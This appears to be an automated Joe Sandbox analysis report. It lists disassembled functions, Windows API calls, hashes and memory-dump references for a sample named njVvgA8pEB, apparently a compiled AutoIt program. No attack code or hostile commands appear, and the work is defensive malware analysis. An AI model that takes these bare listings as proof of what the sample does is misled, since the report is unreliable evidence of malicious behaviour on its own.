                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 3902256705-0
                                                                          • Opcode ID: eb5bcc2dba606814923f7aa90b201dec9901b85174630d235c45373b80bbc569
                                                                          • Instruction ID: 5a1b1e4837c2e3e7695cfc71a0f402cdc65be668462f08937613161432c97e7a
                                                                          • Opcode Fuzzy Hash: eb5bcc2dba606814923f7aa90b201dec9901b85174630d235c45373b80bbc569
                                                                          • Instruction Fuzzy Hash: 9AF0A43550031966DB17BBA9EC95ADF77ACDF01311F10446AF914AA982DF719A4082D1
                                                                          Function 003355FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file_memset
                                                                          • String ID:
                                                                          • API String ID: 26237723-0
                                                                          • Opcode ID: 2182ee9abd4e67ec61dffbdeb2c9268c090ea482eb5bf1e90a9d0f1a41233346
                                                                          • Instruction ID: f6f1a5d8772501e849b019d866914c7198b8cc7abc434ab4917b51dd4a4b8978
                                                                          • Opcode Fuzzy Hash: 2182ee9abd4e67ec61dffbdeb2c9268c090ea482eb5bf1e90a9d0f1a41233346
                                                                          • Instruction Fuzzy Hash: BB0126B1800B08EBCF13AF699C8399F7B61BF90362F418115F8245F1A1DB318A91DF91
                                                                          Function 003353A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00338B28: __getptd_noexit.LIBCMT ref: 00338B28
                                                                          • __lock_file.LIBCMT ref: 003353EB
                                                                            • Part of subcall function 00336C11: __lock.LIBCMT ref: 00336C34
                                                                          • __fclose_nolock.LIBCMT ref: 003353F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          • Opcode ID: ab8ad22583b3c335a62eb76d75b86f9a66976f5ca95a77c71479f10e5e0f83d8
                                                                          • Instruction ID: dfe18b300a508cc7d1f51149c930903ad80da1e3444fce19a852da70e62dc00b
                                                                          • Opcode Fuzzy Hash: ab8ad22583b3c335a62eb76d75b86f9a66976f5ca95a77c71479f10e5e0f83d8
                                                                          • Instruction Fuzzy Hash: 3EF0B471801B049ADB13BF7598867AD7BE06F41374F258208F424AF1C1CFFC89419B92
                                                                          Function 00330C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction ID: 3fd7269452392206e11d396b49daf1eb83c4f19a4db3063f6516519c4d717413
                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction Fuzzy Hash: FE31C070A001059BC71ADF58C4E4A69F7A6FB59300F65A6A5E80ACF752DA31EDC1DB80
                                                                          Function 0034FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 08d24b9efc242d90d5e1b48871418e1d578dd3d2d83d0427790b97f14702b487
                                                                          • Instruction ID: bb658f7fcd6bbe662b93a74ed6c6a85af3a63eb397ca163d96cdce0473d6f8b3
                                                                          • Opcode Fuzzy Hash: 08d24b9efc242d90d5e1b48871418e1d578dd3d2d83d0427790b97f14702b487
                                                                          • Instruction Fuzzy Hash: D14148746047508FDB1ADF14C494B5ABBE1BF49318F0988ACE8998B362C332EC85CF42
                                                                          Function 00317B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 0834e7e35f5b996502350af034f9cbf98abfdef3663a0f56ba42b1d617ab1d5e
                                                                          • Instruction ID: 269ec5ca420b211a01126658794d4630114f8d9558942dfde46f15583aac8742
                                                                          • Opcode Fuzzy Hash: 0834e7e35f5b996502350af034f9cbf98abfdef3663a0f56ba42b1d617ab1d5e
                                                                          • Instruction Fuzzy Hash: 20214B72608A08EBDB1A4F65EC81BA97BF8FF14351F25846EE445C9190EB30F4D0C741
                                                                          Function 00314DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00314BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00314BEF
                                                                            • Part of subcall function 0033525B: __wfsopen.LIBCMT ref: 00335266
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00314E0F
                                                                            • Part of subcall function 00314B6A: FreeLibrary.KERNEL32(00000000), ref: 00314BA4
                                                                            • Part of subcall function 00314C70: _memmove.LIBCMT ref: 00314CBA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                          • String ID:
                                                                          • API String ID: 1396898556-0
                                                                          • Opcode ID: 962d937c69abbb769c8408d74568f7dd192bf35607e9930847813e2c1027b99a
                                                                          • Instruction ID: 5d015675dd3714be153faf069888477ae02a0f4fb1e4a65d826d3cf5412ba306
                                                                          • Opcode Fuzzy Hash: 962d937c69abbb769c8408d74568f7dd192bf35607e9930847813e2c1027b99a
                                                                          • Instruction Fuzzy Hash: D711A331604209ABCF1BAF74D816FEE77A9AF48710F108829F581EF181DA719A419BA1
                                                                          Function 0034FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: bd538602b8399d94a9bbe80668cc44b46c9959b239022a9f4c9f9e2f0d217221
                                                                          • Instruction ID: bcc541cb745cf92265212fad648fe005ca78189b9bd023ca7caefc9ff67b3798
                                                                          • Opcode Fuzzy Hash: bd538602b8399d94a9bbe80668cc44b46c9959b239022a9f4c9f9e2f0d217221
                                                                          • Instruction Fuzzy Hash: 6C215774608701DFCB1ADF24C454B5ABBE5BF88315F05886CF88A8B722D731E845CB92
                                                                          Function 00334863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __lock_file.LIBCMT ref: 003348A6
                                                                            • Part of subcall function 00338B28: __getptd_noexit.LIBCMT ref: 00338B28
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __getptd_noexit__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2597487223-0
                                                                          • Opcode ID: 2fe7b13fade73ddde81e0ab4ee25db695fe4aa385668c09cf6b233cd2b7b841f
                                                                          • Instruction ID: 35638ac5f305fa06fa30002f4f9213a9af078bf7756663a8ef864364e91e4e2b
                                                                          • Opcode Fuzzy Hash: 2fe7b13fade73ddde81e0ab4ee25db695fe4aa385668c09cf6b233cd2b7b841f
                                                                          • Instruction Fuzzy Hash: B4F0CD31901709EBDF13AFB48C867EE36A0AF01329F168418F424AE191CBB9DA51DB91
                                                                          Function 00314E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,?,003D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00314E7E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID:
                                                                          • API String ID: 3664257935-0
                                                                          • Opcode ID: d2c639b82da1f010fa56d34a04d67fd9b97c7465ccc4457839170901f4b1cac4
                                                                          • Instruction ID: 8b7dae04f0f7dbd074abdda8b0afaaa5f8b6eb88a7cfaefacc3a2f3e25ebcdfb
                                                                          • Opcode Fuzzy Hash: d2c639b82da1f010fa56d34a04d67fd9b97c7465ccc4457839170901f4b1cac4
                                                                          • Instruction Fuzzy Hash: 3BF03075501711CFCB3A9F64E494852BBE5BF18335711893EE1D786610C7329880DFA0
                                                                          Function 00330791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003307B0
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LongNamePath_memmove
                                                                          • String ID:
                                                                          • API String ID: 2514874351-0
                                                                          • Opcode ID: f08d79b950625e4215a0e772f694e3e0d898cf79c862e2afe4822cd5b048df38
                                                                          • Instruction ID: ea9b93126638e8102af02d973e73701594f3bf0ebccb407af9e358131808dcc9
                                                                          • Opcode Fuzzy Hash: f08d79b950625e4215a0e772f694e3e0d898cf79c862e2afe4822cd5b048df38
                                                                          • Instruction Fuzzy Hash: 8DE0CD369041285BC721D6589C05FEA77EDDF8C7A0F0841B6FC0CDB205DA61ACC086D0
                                                                          Function 00378E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock
                                                                          • String ID:
                                                                          • API String ID: 2638373210-0
                                                                          • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                          • Instruction ID: 6b6770fffd5a7150ff5bfebe3d5438570c07e7f574af33f0432bd49be7c08777
                                                                          • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                          • Instruction Fuzzy Hash: 66E092B0104B005BD7398B24D840BE377E1AB06304F00081DF2AAD3241EB6278418B59
                                                                          Function 0033525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __wfsopen
                                                                          • String ID:
                                                                          • API String ID: 197181222-0
                                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                          • Instruction ID: b271b912ef2229fcf322ec8077ea4636324fea7d8b20927fd56c6961f0842fbf
                                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                          • Instruction Fuzzy Hash: ADB0927644020C77CE022A82EC02A4A3B299B41764F408020FB0C1C162A673E6649A89
                                                                          Function 012F944C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 012F9461
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                          • Instruction ID: 8cf0e03ba1a5e940752cb3eef1d43a199230bbff89cbf042e77c002b6346cac8
                                                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                          • Instruction Fuzzy Hash: 59E0BF7494010DEFDB00EFB4D5496DE7BB4EF04302F1045A5FE05D7681DB319E548A62
                                                                          Function 012F9450 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 012F9461
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction ID: faa4996c5394d4c0a1230ccb6cfa508c42fff7befc298eb28d50d83e06e1ea4d
                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction Fuzzy Hash: 93E0E67494010DDFDF00EFB4D54969E7FB4EF04302F104165FD01D2281D6319D508A62

                                                                          Non-executed Functions

                                                                          Function 0039CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0039CB37
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039CB95
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0039CBD6
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0039CC00
                                                                          • SendMessageW.USER32 ref: 0039CC29
                                                                          • _wcsncpy.LIBCMT ref: 0039CC95
                                                                          • GetKeyState.USER32(00000011), ref: 0039CCB6
                                                                          • GetKeyState.USER32(00000009), ref: 0039CCC3
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039CCD9
                                                                          • GetKeyState.USER32(00000010), ref: 0039CCE3
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0039CD0C
                                                                          • SendMessageW.USER32 ref: 0039CD33
                                                                          • SendMessageW.USER32(?,00001030,?,0039B348), ref: 0039CE37
                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0039CE4D
                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0039CE60
                                                                          • SetCapture.USER32(?), ref: 0039CE69
                                                                          • ClientToScreen.USER32(?,?), ref: 0039CECE
                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0039CEDB
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0039CEF5
                                                                          • ReleaseCapture.USER32 ref: 0039CF00
                                                                          • GetCursorPos.USER32(?), ref: 0039CF3A
                                                                          • ScreenToClient.USER32(?,?), ref: 0039CF47
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0039CFA3
                                                                          • SendMessageW.USER32 ref: 0039CFD1
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0039D00E
                                                                          • SendMessageW.USER32 ref: 0039D03D
                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0039D05E
                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0039D06D
                                                                          • GetCursorPos.USER32(?), ref: 0039D08D
                                                                          • ScreenToClient.USER32(?,?), ref: 0039D09A
                                                                          • GetParent.USER32(?), ref: 0039D0BA
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0039D123
                                                                          • SendMessageW.USER32 ref: 0039D154
                                                                          • ClientToScreen.USER32(?,?), ref: 0039D1B2
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0039D1E2
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0039D20C
                                                                          • SendMessageW.USER32 ref: 0039D22F
                                                                          • ClientToScreen.USER32(?,?), ref: 0039D281
                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0039D2B5
                                                                            • Part of subcall function 003125DB: GetWindowLongW.USER32(?,000000EB), ref: 003125EC
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0039D351
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                          • String ID: @GUI_DRAGID$F$pb=
                                                                          • API String ID: 3977979337-1510193112
                                                                          • Opcode ID: d983b57e84277fc9abfb1fb763c4fad33317344c16b21dff8c1300e9d8f4ea1a
                                                                          • Instruction ID: 645e16d2ae14e0a32c2c03a06ac335b8f0940f4e5fb01e962019b8ce915c2835
                                                                          • Opcode Fuzzy Hash: d983b57e84277fc9abfb1fb763c4fad33317344c16b21dff8c1300e9d8f4ea1a
                                                                          • Instruction Fuzzy Hash: 5442AC74204341AFDB26CF28D885EAABBE9FF49350F15091AF595CB2B0C731E950DB92
                                                                          Function 00326F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_memset
                                                                          • String ID: ]<$3c2$DEFINE$P\<$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_2
                                                                          • API String ID: 1357608183-1036164097
                                                                          • Opcode ID: 0e289097325c4a303d83c98f917606501ee7ae6e570a8f3c00c7d165d487415b
                                                                          • Instruction ID: 43794acb38a3a20179bee3679a93fd9c4d0599784233a07758d3df421cf44b70
                                                                          • Opcode Fuzzy Hash: 0e289097325c4a303d83c98f917606501ee7ae6e570a8f3c00c7d165d487415b
                                                                          • Instruction Fuzzy Hash: EB93B275E04219DFDB26CF98D881BADB7B1FF48310F26816AE945AB385E7709D81CB40
                                                                          Function 003148D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
